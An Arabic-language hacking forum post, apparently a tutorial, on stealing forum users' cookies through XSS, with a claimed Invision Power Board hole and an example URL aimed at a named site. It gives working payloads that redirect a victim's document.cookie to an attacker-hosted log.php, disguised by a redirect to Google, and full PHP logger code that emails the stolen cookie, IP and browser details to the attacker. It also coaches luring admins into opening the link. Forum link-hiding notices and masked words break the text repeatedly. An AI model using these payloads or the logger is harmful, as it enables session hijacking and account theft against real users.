السلام عليكم ورحمه الله وبركاته ,,

الان هذا اول درس لي بهذا القسمبعد الغياب وهو يتكلم عن كيفيه عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط ثغرات
xss

طيب نأتي الان الى الكود المهم في عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط xss

هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقطxss
كود PHP:
<Script>javascript:alert(document.******)</Script>

الأن الكود هذا لم يكون بالثغره سوف يظهر لك الكوكيز تبعك وهو يحتوي على نقاط مهمه وهي :
1- رقم العضويه
2- الباسورد مشفر md5
3 - الباسورد مشفر Hash

ورقم الاستايل وغيره ,, على حسب نوعيه البرنامج المصاب!

طيب الحين وجدت هذا الكود سوف نربطه باللوج

ماهو اللوج ؟
اللوج هذا تربطه مع السكربت الذي ياتي بالكوكيز ,, وبعد ان تربطه كل من فتح السكربت وهو مربوط باللوج سوف يسجل معلومات الكوكيز تبعه باللوج او يرسل الى ايميلك ( على حسب اللوج )

طيب الان بعد ما ربطته اصبح الرابط :
كود PHP:
<Script>location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>

تمام الان :
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط = الموقع المربوط فيه اللوج
log.php = اسم ملف اللوج
طيب الحين نرفع اللوج على اي موقع عندك وبعد كذا تستبدل
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط برابط اللوج الي عندك

المهم الان هذا السكربت اصبح جاهزا للاستعمال سوف نضعه بكود الثغره ونستبدل :
كود PHP:
<Script>javascript:alert(document.******)</Script>

بـ
كود PHP:
<Script>location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>

الان نخلي مثلا المدير العام او اي عضو تبي تسرق الكوكيز تبعه انه يفتح الرابط

بتقول كيف بقولك ياااولد انت وراااااسك(6) عاد بطريقتك خليه يفتح الرابط

طيب الحين بتقولي والله فضيحه يابو خالد لم اخليه يفتح الرابط يطلع عنده اللوج وبيكشفني

بقوله ولا يهمك اخوي نربطه كمان بموقع للتمويه

مثلا نربطه بموقع عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط بحيث انه لم يفتح الثغره والمربوط فيها اللوج وموقع جوجل راح يتحول اوتوماتيك الى جوجل وبكذا مايشك

بتقول كيف يابو خالد بقولك كذا نضع بعد رابط اللوج :
re=www.google.com&
بس
بحيث يكون بعد & يوجد id ... الخ
يعني يكون الكود :
كود PHP:
<Script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script>

طبعا انت استبدل عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط باي موقع تبغاه ويفضل يكون الموقع الي مصاب فيه الثغره (1)

طيب الحين تقول كذا تمام يابو خالد يالله عطنا مثااال

بعطيكم مثال لثغره الي اكتشفتها انا بمنتديات :Invision Power Board

الكود للثغره :
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط '>**********alert(document.******)</script>
احنا راح نستبدل :
كود PHP:
<Script>javascript:alert(document.******)</Script>

بـ
كود PHP:
<Script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script>

واستبدل هنا موقع جوجل باي موقع تبغاه

ورابط اللوج عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط باللوج تبعك

====================
تطبيق :

التطبيق هنا :
كود PHP:
http://www.mahrum.com/forums/index.php?act=idx='>**********alert(document.***** *) </script>

===================
اللوج :
كود PHP:
<?php
// Thnx For Security 4 Arab - عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط - عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط
//----- S4a Logger v0.10 -----//
// Star
//Your Email --::--
$ToGet = "[email protected]";
////////////////////////////////
$Ip = $REMOTE_ADDR;
$Sys = $HTTP_USER_AGENT;
//////////////////////////////////////////////
if($ToGet == ''){echo 'Edit Your Email Befor You Use Me !!'; exit();}
//
$Time = date("l dS of F Y h:i:s A");

$Hdr = 'From: Logger <logger@secourty>';

$Msg = '
Hi ,, Mr.Attacker :D
-------------------------------------------
- Thnx For S4a ,, Security For Arab Forum -
- s4a -
- s4a froum -
---------------------------------------------------------------------
- This Script Coded By Devil-00 [ Devil From Palestine ] -
- <[email protected]><[email protected]><devil0f0p@ya hoo.com> -
---------------------------------------------------------------------
- IP ::- [ '
.$Ip.' ]
- System ::- [ '
.$Sys.' ]
- The ****** ::- [ '
.$id.' ]
- Time ::- [ '
.$Time.' ]
---------------------------------------------------------------------
- root@devil00 ~ ./evilcat /etc/passwd -
- root@devil00 ~ ./s4acracker passwd --log <log.log> && -
---------------------------------------------------------------------
'
;
$send = mail($ToGet,'S4a - [ New****** ]',$Msg,$Hdr);
//
/* &@#&@#&@#&@#&@#&@#&@# code ,, By Devil-00 [ 25/5/2005 ] << v0.10 */
if(isset($_GET["re"])){
$&@#&@#&@#&@#&@#&@#&@# = $_GET["re"];
if(
$&@#&@#&@#&@#&@#&@#&@# == ""){
mail ($ToGet,'S4a - [Error]','&@#&@#&@#&@#&@#&@#&@# Is Set And Its Empty !!',$Hdr);
}else{
header("location:".$&@#&@#&@#&@#&@#&@#&@#);
}
}
//
?>

استبدل هنا :
كود PHP:
$ToGet = "[email protected]";

الايميل: عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط
بالايميل تبعك !

واحفظه بامتداد php طبعا افتح المفكره وحط الكود ولاتنسى تغير ا
ع التطبيق الا لانه درس عملي فقط لا أكثر ..

وبإمكانك استغلاله بثغره xss تبع cPanel
وغيرها من عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط xss